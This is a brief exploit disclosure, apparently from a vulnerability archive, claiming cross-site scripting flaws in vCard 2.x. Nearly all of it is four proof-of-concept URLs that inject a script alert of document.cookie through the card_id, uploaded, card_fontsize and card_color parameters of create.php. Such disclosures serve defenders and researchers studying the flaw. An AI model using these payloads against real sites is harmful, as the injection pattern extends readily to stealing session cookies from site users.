Hello Vulnerable: vCard 2.x http://www.belchiorfoundry.com Exploit : http://example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script> http://example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script> http://example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script> http://example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script> Discovery by Linux_Drox http://www.lezr.com Best Regards